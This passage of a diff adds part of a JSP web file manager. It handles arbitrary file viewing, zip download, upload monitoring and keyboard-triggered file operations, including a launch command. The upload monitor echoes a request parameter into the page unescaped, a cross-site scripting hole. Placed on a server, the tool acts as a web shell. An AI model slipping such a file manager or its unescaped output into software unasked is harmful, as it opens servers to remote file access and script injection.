+ <%// Filter files and dirs in FileList%>
+ function filter (begriff){
+ var suche = begriff.value.toLowerCase();
+ var table = document.getElementById("filetable");
+ var ele;
+ for (var r = 1; r < table.rows.length; r++){
+ ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,"");
+ if (ele.toLowerCase().indexOf(suche)>=0 )
+ table.rows[r].style.display = '';
+ else table.rows[r].style.display = 'none';
+ }
+ }
+ <%//(De)select all checkboxes%>
+ function AllFiles(){
+ for(var x=0;x < document.FileList.elements.length;x++){
+ var y = document.FileList.elements[x];
+ var ytr = y.parentNode.parentNode;
+ var check = document.FileList.selall.checked;
+ if(y.name == 'selfile' && ytr.style.display != 'none'){
+ if (y.disabled != true){
+ y.checked = check;
+ if (y.checked == true) ytr.className = 'checked';
+ else ytr.className = 'mouseout';
+ }
+ }
+ }
+ }
+
+ function shortKeyHandler(_event){
+ if (!_event) _event = window.event;
+ if (_event.which) {
+ keycode = _event.which;
+ } else if (_event.keyCode) {
+ keycode = _event.keyCode;
+ }
+ var t = document.getElementById("text_Dir");
+ //z
+ if (keycode == 122){
+ document.getElementById("but_Zip").click();
+ }
+ //r, F2
+ else if (keycode == 113 || keycode == 114){
+ var path = prompt("Please enter new filename", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Ren").click();
+ }
+ //c
+ else if (keycode == 99){
+ var path = prompt("Please enter filename", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_NFi").click();
+ }
+ //d
+ else if (keycode == 100){
+ var path = prompt("Please enter directory name", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_NDi").click();
+ }
+ //m
+ else if (keycode == 109){
+ var path = prompt("Please enter move destination", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Mov").click();
+ }
+ //y
+ else if (keycode == 121){
+ var path = prompt("Please enter copy destination", "");
+ if (path == null) return;
+ t.value = path;
+ document.getElementById("but_Cop").click();
+ }
+ //l
+ else if (keycode == 108){
+ document.getElementById("but_Lau").click();
+ }
+ //Del
+ else if (keycode == 46){
+ document.getElementById("but_Del").click();
+ }
+ }
+
+ function popUp(URL){
+ fname = document.getElementsByName("myFile")[0].value;
+ if (fname != "")
+ window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes")
+ }
+
+ document.onkeypress = shortKeyHandler;
+<% }
+ // View file
+ else if (request.getParameter("file") != null) {
+ File f = new File(request.getParameter("file"));
+ if (!isAllowed(f, false)) {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
+ }
+ else if (f.exists() && f.canRead()) {
+ if (isPacked(f.getName(), false)) {
+ //If zipFile, do nothing here
+ }
+ else{
+ String mimeType = getMimeType(f.getName());
+ response.setContentType(mimeType);
+ if (mimeType.equals("text/plain")) response.setHeader(
+ "Content-Disposition", "inline;filename=\"temp.txt\"");
+ else response.setHeader("Content-Disposition", "inline;filename=\""
+ + f.getName() + "\"");
+ BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[8 * 1024];
+ out.clearBuffer();
+ OutputStream out_s = new Writer2Stream(out);
+ copyStreamsWithoutClose(fileInput, out_s, buffer);
+ fileInput.close();
+ out_s.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ }
+ else {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "File " + f.getAbsolutePath()
+ + " does not exist or is not readable on the server");
+ }
+ }
+ // Download selected files as zip file
+ else if ((request.getParameter("Submit") != null)
+ && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
+ Vector v = expandFileList(request.getParameterValues("selfile"), false);
+ //Check if all files in vector are allowed
+ String notAllowedFile = null;
+ for (int i = 0;i < v.size(); i++){
+ File f = (File) v.get(i);
+ if (!isAllowed(f, false)){
+ notAllowedFile = f.getAbsolutePath();
+ break;
+ }
+ }
+ if (notAllowedFile != null){
+ request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
+ }
+ else if (v.size() == 0) {
+ request.setAttribute("error", "No files selected");
+ }
+ else {
+ File dir_file = new File("" + request.getAttribute("dir"));
+ int dir_l = dir_file.getAbsolutePath().length();
+ response.setContentType("application/zip");
+ response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
+ out.clearBuffer();
+ ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
+ zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
+ zipout.setLevel(COMPRESSION_LEVEL);
+ for (int i = 0; i < v.size(); i++) {
+ File f = (File) v.get(i);
+ if (f.canRead()) {
+ zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
+ BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[0xffff];
+ copyStreamsWithoutClose(fr, zipout, buffer);
+ /* int b;
+ while ((b=fr.read())!=-1) zipout.write(b);*/
+ fr.close();
+ zipout.closeEntry();
+ }
+ }
+ zipout.finish();
+ out.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ }
+ // Download file
+ else if (request.getParameter("downfile") != null) {
+ String filePath = request.getParameter("downfile");
+ File f = new File(filePath);
+ if (!isAllowed(f, false)){
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
+ }
+ else if (f.exists() && f.canRead()) {
+ response.setContentType("application/octet-stream");
+ response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+ + "\"");
+ response.setContentLength((int) f.length());
+ BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+ byte buffer[] = new byte[8 * 1024];
+ out.clearBuffer();
+ OutputStream out_s = new Writer2Stream(out);
+ copyStreamsWithoutClose(fileInput, out_s, buffer);
+ fileInput.close();
+ out_s.flush();
+ nohtml = true;
+ dir_view = false;
+ }
+ else {
+ request.setAttribute("dir", f.getParent());
+ request.setAttribute("error", "File " + f.getAbsolutePath()
+ + " does not exist or is not readable on the server");
+ }
+ }
+ if (nohtml) return;
+ //else
+ // If no parameter is submitted, it will take the path from jsp file browser
+ if (request.getAttribute("dir") == null) {
+ String path = null;
+ if (application.getRealPath(request.getRequestURI()) != null) {
+ File f = new File(application.getRealPath(request.getRequestURI())).getParentFile();
+ //This is a hack needed for tomcat
+ while (f != null && !f.exists())
+ f = f.getParentFile();
+ if (f != null)
+ path = f.getAbsolutePath();
+ }
+ if (path == null) { // handle the case where we are not in a directory (ex: war file)
+ path = new File(".").getAbsolutePath();
+ }
+ //Check path
+ if (!isAllowed(new File(path), false)){
+ //TODO Blacklist
+ if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
+ else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
+ }
+ request.setAttribute("dir", path);
+ }%>
+
+
+
+
+
+
+
+<%
+ //If a cssfile exists, it will take it
+ String cssPath = null;
+ if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
+ application.getRealPath(request.getRequestURI())).getParent()
+ + File.separator + CSS_NAME;
+ if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
+ if (new File(cssPath).exists()) {
+%>
+
+ <%}
+ else if (request.getParameter("uplMonitor") == null) {%>
+
+ <%}
+
+ //Check path
+ if (!isAllowed(new File((String)request.getAttribute("dir")), false)){
+ request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
+ }
+ //Upload monitor
+ else if (request.getParameter("uplMonitor") != null) {%>
+ <%
+ String fname = request.getParameter("uplMonitor");
+ //First opening
+ boolean first = false;
+ if (request.getParameter("first") != null) first = true;
+ UplInfo info = new UplInfo();
+ if (!first) {
+ info = UploadMonitor.getInfo(fname);
+ if (info == null) {
+ //Windows
+ int posi = fname.lastIndexOf("\\");
+ if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+ }
+ if (info == null) {
+ //Unix
+ int posi = fname.lastIndexOf("/");
+ if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
+ }
+ }
+ dir_view = false;
+ request.setAttribute("dir", null);
+ if (info.aborted) {
+ UploadMonitor.remove(fname);
+ %>
+
+
+Upload of <%=fname%>
+Upload aborted.
+<%
+ }
+ else if (info.totalSize != info.currSize || info.currSize == 0) {
+ %>
+
+
+
+Upload of <%=fname%>
+
+
+<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
+(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
+Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
+
+